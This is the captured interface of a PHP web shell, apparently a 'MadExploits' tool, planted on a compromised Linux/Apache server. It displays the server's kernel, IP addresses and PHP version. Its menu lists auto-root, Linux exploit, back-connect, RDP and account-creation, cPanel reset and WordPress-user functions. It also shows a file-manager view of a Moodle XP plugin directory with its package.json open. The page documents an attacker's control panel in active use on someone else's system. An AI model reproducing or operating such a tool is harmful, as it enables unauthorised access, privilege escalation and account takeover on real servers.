Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
xp /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
yui
[ DIR ]
drwxr-xr-x
.eslintrc
322
B
-rw-r--r--
.gitattributes
44
B
-rw-r--r--
.gitignore
39
B
-rw-r--r--
.travis.yml
3.29
KB
-rw-r--r--
CHANGELOG.md
11.21
KB
-rw-r--r--
README.md
3.24
KB
-rw-r--r--
ajax.php
1.2
KB
-rw-r--r--
block_xp.php
1.71
KB
-rw-r--r--
composer.json
502
B
-rw-r--r--
edit_form.php
1.67
KB
-rw-r--r--
gulpfile.js
2.83
KB
-rw-r--r--
index.php
1.45
KB
-rw-r--r--
lib.php
1.59
KB
-rw-r--r--
package.json
1.07
KB
-rw-r--r--
postcss.config.js
186
B
-rw-r--r--
renderer.php
38.94
KB
-rw-r--r--
settings.php
1.16
KB
-rw-r--r--
styles.css
21.07
KB
-rw-r--r--
tailwind.config.js
1.85
KB
-rw-r--r--
tsconfig.json
1017
B
-rw-r--r--
version.php
1.06
KB
-rw-r--r--
webpack.common.js
855
B
-rw-r--r--
webpack.dev.js
152
B
-rw-r--r--
webpack.prod.js
201
B
-rw-r--r--
yarn.lock
178.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "block_xp", "version": "3.12.0", "description": "Level Up XP plugin for Moodle", "repository": "git@github.com:FMCorz/moodle-block_xp.git", "author": "Frédéric Massart <fred@branchup.tech>", "license": "GPLv3", "private": true, "dependencies": { "autoprefixer": "^10.2.5", "gulp": "^4.0.2", "gulp-cli": "^2.3.0", "gulp-postcss": "^9.0.0", "gulp-replace": "^1.1.3", "postcss": "^8.2.9", "postcss-cli": "^8.3.1", "postcss-color-rgba-fallback": "^4.0.0", "react": "^17.0.2", "react-dom": "^17.0.2", "react-numeric-input": "^2.2.3", "react-query": "^3.13.12", "tailwindcss": "^2.1.1", "ts-loader": "^8.1.0", "typescript": "^4.2.4", "webpack": "^5.31.0", "webpack-cli": "^4.6.0", "webpack-merge": "^5.7.3" }, "devDependencies": { "@types/react": "^17.0.3", "@types/react-dom": "^17.0.3", "@types/react-numeric-input": "^2.2.3", "prop-types": "^15.7.2" }, "scripts": { "dist": "NODE_ENV=production npx gulp dist", "watch": "NODE_ENV=development npx gulp watch" } }
Close